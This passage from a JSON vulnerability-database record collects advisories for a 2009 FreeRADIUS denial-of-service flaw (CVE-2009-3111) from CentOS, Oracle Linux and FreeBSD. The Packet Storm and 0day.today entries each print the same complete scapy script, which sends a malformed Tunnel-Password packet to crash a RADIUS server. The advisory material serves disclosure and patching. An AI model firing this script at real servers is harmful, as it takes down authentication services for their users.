After installing the\nupdate, radiusd will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028266.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028267.html\n\n**Affected packages:**\nfreeradius\nfreeradius-mysql\nfreeradius-postgresql\nfreeradius-unixODBC\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html", "edition": 3, "modified": "2009-10-30T14:43:49", "published": "2009-10-30T14:43:49", "href": "http://lists.centos.org/pipermail/centos-announce/2009-October/028266.html", "id": "CESA-2009:1451", "title": "freeradius security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:57", "description": "", "published": "2009-09-11T00:00:00", "type": "packetstorm", "title": "FreeRadius Packet Of Death", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "modified": "2009-09-11T00:00:00", "id": "PACKETSTORM:81198", "href": "https://packetstormsecurity.com/files/81198/FreeRadius-Packet-Of-Death.html", "sourceData": "`#!/usr/bin/env python \n# FreeRadius Packet Of Death \n# Matthew Gillespie 2009-09-11 \n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py \n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/ \n \nimport sys \nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr \n \nif len(sys.argv) != 2: \nprint \"Usage: radius_killer.py <radiushost>\\n\" \nsys.exit(1) \n \nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\ \nRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\ \nRadiusAttr(type=69,value=\"\",len=2) \n \nsend(PoD) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/81198/freeradius-dos.txt"}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "[1.1.3-1.5]\n- Security: Fix Tunnel-Password zero-length attributes flaw (bug #521912)\n Resolves: RH BZ#522062\n- rebase a couple of old patches (freeradius-0.9.0-com_err.patch,\n freeradius-1.0.0-samba3.patch) so they apply with fuzz=0 ", "edition": 4, "modified": "2009-09-17T00:00:00", "published": "2009-09-17T00:00:00", "id": "ELSA-2009-1451", "href": "http://linux.oracle.com/errata/ELSA-2009-1451.html", "title": "freeradius security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3111"], "description": "\nfreeRADIUS Vulnerability Notifications reports:\n\n2009.09.09 v1.1.7 - Anyone who can send packets to\n\t the server can crash it by sending a Tunnel-Password\n\t attribute in an Access-Request packet. This\n\t vulnerability is not otherwise exploitable. We have\n\t released 1.1.8 to correct this vulnerability.\nThis issue is similar to the previous Tunnel-Password\n\t issue noted below. The vulnerable versions are 1.1.3\n\t through 1.1.7. 
Version 2.x is not affected.\n\n", "edition": 4, "modified": "2009-12-14T00:00:00", "published": "2009-09-09T00:00:00", "id": "1B3F854B-E4BD-11DE-B276-000D8787E1BE", "href": "https://vuxml.freebsd.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html", "title": "freeradius -- remote packet of death vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2018-02-16T05:08:01", "edition": 2, "description": "Exploit for multiple platform in category dos / poc", "published": "2009-09-11T00:00:00", "type": "zdt", "title": "FreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)", "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-09-11T00:00:00", "id": "1337DAY-ID-7004", "href": "https://0day.today/exploit/description/7004", "sourceData": "=================================================================\r\nFreeRadius < 1.1.8 Remote Packet of Death Exploit (CVE-2009-3111)\r\n=================================================================\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint \"Usage: radius_killer.py <radiushost>\\n\"\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=\"\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\",id=180)/ \\\r\n\tRadiusAttr(type=69,value=\"\",len=2)\r\n\r\nsend(PoD)\r\n\r\n\r\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7004"}]}